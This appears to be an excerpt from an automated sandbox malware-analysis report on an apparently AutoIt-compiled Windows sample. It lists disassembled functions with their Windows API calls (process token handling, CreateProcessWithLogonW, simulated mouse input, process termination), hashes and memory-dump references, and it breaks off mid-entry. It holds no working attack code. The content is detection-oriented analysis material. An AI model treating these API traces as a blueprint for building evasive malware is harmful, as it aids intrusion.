Instruction ID: 9bd5e336f4b10f8d7273e67f32482d272cb0ba93ac214aef19c2ddc65f3d4f8f
Opcode Fuzzy Hash: f2a6f5382714c27319aab2bf83acd580bc7c789af58717d0898c774754ebb474
Instruction Fuzzy Hash: A3513931608240AFCB14EB64D885E6FBBE8FF88714F04495DF995972A1DB31E909CB72

Function 00D85A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00D85A82
GetMenuItemCount.USER32(00000000), ref: 00D85AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D85AE1
GetMenuItemID.USER32(?,?), ref: 00D85B50
GetSubMenu.USER32(?,?), ref: 00D85B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00D85BAF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: fcb8d0899489748a448bab3284d581677d9a01c13817ec9ad78fc58ae35cdc4e
Instruction ID: ba5e308d256eca9bcd2ff7b24ad5f2a81fa5d5ef66018746a4ec62c23b6bb879
Opcode Fuzzy Hash: fcb8d0899489748a448bab3284d581677d9a01c13817ec9ad78fc58ae35cdc4e
Instruction Fuzzy Hash: 94519D31A00615EFCF15EFA4D885AAEB7B5EF58320F1440A9E845BB351CB30BE408BB0

Function 00D5F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D5F3F7
VariantClear.OLEAUT32(00000013), ref: 00D5F469
VariantClear.OLEAUT32(00000000), ref: 00D5F4C4
_memmove.LIBCMT ref: 00D5F4EE
VariantClear.OLEAUT32(?), ref: 00D5F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D5F569

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 745791d572d937b8df30b429cf8f6d85e1766a5288b3ad04bc2885680aa2508a
Instruction ID: 66106cffd53e7e61841b8ef72e31a6f61561bdaf08c56427bd1e7b64be17df7e
Opcode Fuzzy Hash: 745791d572d937b8df30b429cf8f6d85e1766a5288b3ad04bc2885680aa2508a
Instruction Fuzzy Hash: 7A5168B5A00209EFCB10CF58D884EAAB7B8FF4C354B15856AED59DB340E730E915CBA0

Function 00D626F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D62747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D62792
IsMenu.USER32(00000000), ref: 00D627B2
CreatePopupMenu.USER32 ref: 00D627E6
GetMenuItemCount.USER32(000000FF), ref: 00D62844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00D62875

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 6480362d937c4f8ea9527929d0f595b6db4b3f8f3a42082541e6fb3dc9e2d6c4
Instruction ID: 0a00a7dd29a0c58cebb4b9f3d8635b495bfb4f3d130b4de08fe6dff82489fe7c
Opcode Fuzzy Hash: 6480362d937c4f8ea9527929d0f595b6db4b3f8f3a42082541e6fb3dc9e2d6c4
Instruction Fuzzy Hash: E2518C70A00B0AEBDF24CF68DC88ABEBBF5EF54314F184169E8519B291D7709944CBB1

Function 00D01765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00D0179A
GetWindowRect.USER32(?,?), ref: 00D017FE
ScreenToClient.USER32(?,?), ref: 00D0181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D0182C
EndPaint.USER32(?,?), ref: 00D01876

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: a2ed632a6b16e1c16dfd24e3a3da220864ab5eb5b0b85ce115032537ce0e0e00
Instruction ID: c40e43c356029718bf6106703af3b8853feabd08c9c82b7b91ed5b05595cb571
Opcode Fuzzy Hash: a2ed632a6b16e1c16dfd24e3a3da220864ab5eb5b0b85ce115032537ce0e0e00
Instruction Fuzzy Hash: 00418874100302AFD710DF24C889FBA7BE8EB49724F084629FAA8C62E1C771D945DB71

Function 00D8B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00DC67B0,00000000,00FC5AD8,?,?,00DC67B0,?,00D8B862,?,?), ref: 00D8B9CC
EnableWindow.USER32(00000000,00000000), ref: 00D8B9F0
ShowWindow.USER32(00DC67B0,00000000,00FC5AD8,?,?,00DC67B0,?,00D8B862,?,?), ref: 00D8BA50
ShowWindow.USER32(00000000,00000004,?,00D8B862,?,?), ref: 00D8BA62
EnableWindow.USER32(00000000,00000001), ref: 00D8BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00D8BAA9

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 506d0fcd495fefd27b04e9aff64c790900d8c9bce731228606f1bb0b485358a4
Instruction ID: 52ec312ce591e9c87603312d886d5385e5938390a05309d88185e93041f65b44
Opcode Fuzzy Hash: 506d0fcd495fefd27b04e9aff64c790900d8c9bce731228606f1bb0b485358a4
Instruction Fuzzy Hash: 87415030600641AFDB25EF15C489B957BE0FF05320F1C42BAEA588F2A2C771A845CF71

Function 00D773B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00D75134,?,?,00000000,00000001), ref: 00D773BF

Part of subcall function 00D73C94: GetWindowRect.USER32(?,?), ref: 00D73CA7

GetDesktopWindow.USER32 ref: 00D773E9
GetWindowRect.USER32(00000000), ref: 00D773F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00D77422

Part of subcall function 00D654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D6555E

GetCursorPos.USER32(?), ref: 00D7744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D774AC

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: bd04c38a2280395bebeaed1905e4b61745c02601b5723f2c055c97ef747cfd5e
Instruction ID: ec7d288fb5387c806a5aa5b4b732910395ef5afc8036c87608dae42c604282dc
Opcode Fuzzy Hash: bd04c38a2280395bebeaed1905e4b61745c02601b5723f2c055c97ef747cfd5e
Instruction Fuzzy Hash: 1C31B272508305ABD720DF54D849F9BBBE9FF88318F004919F589E7291DB30E958CBA2

Function 00D58D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D585F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D58608
Part of subcall function 00D585F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D58612
Part of subcall function 00D585F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D58621
Part of subcall function 00D585F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D58628
Part of subcall function 00D585F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D5863E

GetLengthSid.ADVAPI32(?,00000000,00D58977), ref: 00D58DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D58DB8
HeapAlloc.KERNEL32(00000000), ref: 00D58DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00D58DD8
GetProcessHeap.KERNEL32(00000000,00000000,00D58977), ref: 00D58DEC
HeapFree.KERNEL32(00000000), ref: 00D58DF3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 5260ebfa349cba315850c3c3b1f2501405f79acdda71f66ab06bc84dda7d7943
Instruction ID: d70bc8e7653d31896d367b593496b66e4f393b0d02ba8705c72afde4bc344882
Opcode Fuzzy Hash: 5260ebfa349cba315850c3c3b1f2501405f79acdda71f66ab06bc84dda7d7943
Instruction Fuzzy Hash: 71119A71510705EFDF109BA4CC49BAE7BB9EB55316F14402AEC85E7250DB369908EB70

Function 00D58AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D58B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00D58B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D58B40
CloseHandle.KERNEL32(00000004), ref: 00D58B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D58B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00D58B8E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: fd43713fca2abb76f3f5b0891056677700c5aa479cba58c06d9749f5c96f8063
Instruction ID: 951138cfb43cf253e5c9ecb4e228dd03d1e44ab290b725bf4deb378afe59b0e4
Opcode Fuzzy Hash: fd43713fca2abb76f3f5b0891056677700c5aa479cba58c06d9749f5c96f8063
Instruction Fuzzy Hash: B31159B2600209ABDF018FA4ED49FDE7BADEF08305F184064FE04E2160C7769D65AB70

Function 00D8C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00D012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D0134D
Part of subcall function 00D012F3: SelectObject.GDI32(?,00000000), ref: 00D0135C
Part of subcall function 00D012F3: BeginPath.GDI32(?), ref: 00D01373
Part of subcall function 00D012F3: SelectObject.GDI32(?,00000000), ref: 00D0139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00D8C1C4
LineTo.GDI32(00000000,00000003,?), ref: 00D8C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00D8C1E6
LineTo.GDI32(00000000,00000000,?), ref: 00D8C1F6
EndPath.GDI32(00000000), ref: 00D8C206
StrokePath.GDI32(00000000), ref: 00D8C216

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: c54826a167e5e7b76d799cfb7a5ade3383a15a915b05a73a50497fa6efb581ec
Instruction ID: c869790fe860ffa902afcac9a5a19fde1b18da95557c993519afc26e281bb516
Opcode Fuzzy Hash: c54826a167e5e7b76d799cfb7a5ade3383a15a915b05a73a50497fa6efb581ec
Instruction Fuzzy Hash: 1811097640020DFFDB119F90DC88FAA7FADEF08354F048021BA188A2A1C7719D55DBB0

Function 00D203A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D203D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00D203DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D203E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D203F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00D203F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D20401

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: ac96c471a622d5722cc5aff874232fa839e4460f63df440453bcd8e969cddb27
Instruction ID: 08f8e89c274a4a3b750ac1d25f8c4dc3fa3c87c494b794dd95e7efe7c0caa551
Opcode Fuzzy Hash: ac96c471a622d5722cc5aff874232fa839e4460f63df440453bcd8e969cddb27
Instruction Fuzzy Hash: ED016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87A41C7F5A864CBE5

Function 00D6568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D6569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D656B1
GetWindowThreadProcessId.USER32(?,?), ref: 00D656C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D656CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D656D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D656E0

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0df30f9ec7544dc033507904e13df788d7fff81917d0408a64ccaa406dcb4d4b
Instruction ID: 7d9d5f9840ce74773ada88758a3a5ad342d6c1def4a2d4dd4ea48feefa4d8d1a
Opcode Fuzzy Hash: 0df30f9ec7544dc033507904e13df788d7fff81917d0408a64ccaa406dcb4d4b
Instruction Fuzzy Hash: 3AF03032251258BBE7215BA2EC0EEEF7B7CEFCAB11F000269FA04D1150E7A11A11C7B5

Function 00D674D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00D674E5
EnterCriticalSection.KERNEL32(?,?,00D11044,?,?), ref: 00D674F6
TerminateThread.KERNEL32(00000000,000001F6,?,00D11044,?,?), ref: 00D67503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00D11044,?,?), ref: 00D67510

Part of subcall function 00D66ED7: CloseHandle.KERNEL32(00000000,?,00D6751D,?,00D11044,?,?), ref: 00D66EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00D67523
LeaveCriticalSection.KERNEL32(?,?,00D11044,?,?), ref: 00D6752A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: a8395673de72d471a763058feee4186e72f36a62ee743daccb685f5c662daf72
Instruction ID: c0674719b5cef8af41c763184b1bbf49d01d14a68ad230cfad4222029abb0bef
Opcode Fuzzy Hash: a8395673de72d471a763058feee4186e72f36a62ee743daccb685f5c662daf72
Instruction Fuzzy Hash: 8CF05E7A150712EBDB111B64FC8CAEB772AEF45312B140572F243D11B1DB755811CB74

Function 00D58E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D58E7F
UnloadUserProfile.USERENV(?,?), ref: 00D58E8B
CloseHandle.KERNEL32(?), ref: 00D58E94
CloseHandle.KERNEL32(?), ref: 00D58E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00D58EA5
HeapFree.KERNEL32(00000000), ref: 00D58EAC

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 95cdc449b35c01dfa783633d2ae47945b7a4d8c89f9b1f8f2504ccfb8932cedd
Instruction ID: c2c67abea303c5aeab87cef3f608bfc023d66a847c218cf341cc5a9023e968d2
Opcode Fuzzy Hash: 95cdc449b35c01dfa783633d2ae47945b7a4d8c89f9b1f8f2504ccfb8932cedd
Instruction Fuzzy Hash: 61E0C276014201FBDA011FE1EC0C90ABB69FB99322B108230F219C1274CB32A421DB60

Function 00D78902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D78928
CharUpperBuffW.USER32(?,?), ref: 00D78A37
VariantClear.OLEAUT32(?), ref: 00D78BAF

Part of subcall function 00D67804: VariantInit.OLEAUT32(00000000), ref: 00D67844
Part of subcall function 00D67804: VariantCopy.OLEAUT32(00000000,?), ref: 00D6784D
Part of subcall function 00D67804: VariantClear.OLEAUT32(00000000), ref: 00D67859

Strings

Incorrect Parameter format, xrefs: 00D78960, 00D78B22
AUTOIT.ERROR, xrefs: 00D78A3D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 3c042890ea16cfc6e77eca44321e6f70a3c1518c6792fabb14b5b471bf9e2102
Instruction ID: 848c83203e5cc7c7cd3b94f785ea80abac3127cee7c1f57374fd29bca9dcce52
Opcode Fuzzy Hash: 3c042890ea16cfc6e77eca44321e6f70a3c1518c6792fabb14b5b471bf9e2102
Instruction Fuzzy Hash: 769150716443019FC710DF28C49595BBBE4EF89314F14896EF89A8B3A2EB31E945CB72

Function 00D62F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D1FEC6: _wcscpy.LIBCMT ref: 00D1FEE9

_memset.LIBCMT ref: 00D63077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D630A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D63159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D63187

Strings

0, xrefs: 00D63063

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: c7a964a095d211dd2c95b89bc79abc72df577003f2fb59b57a554d6f3cfb5f90
Instruction ID: c3b1fbc98bbf623e9951591f1e8f4cb76aa1e10999a09946998af1f78f30e8e4
Opcode Fuzzy Hash: c7a964a095d211dd2c95b89bc79abc72df577003f2fb59b57a554d6f3cfb5f90
Instruction Fuzzy Hash: 0B51A0316083019FD7259F28D845A6BBBE8EF66360F08492DF895D32D1DB74CE4887B2

Function 00D5DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D5DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D5DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D5DB8E

Strings

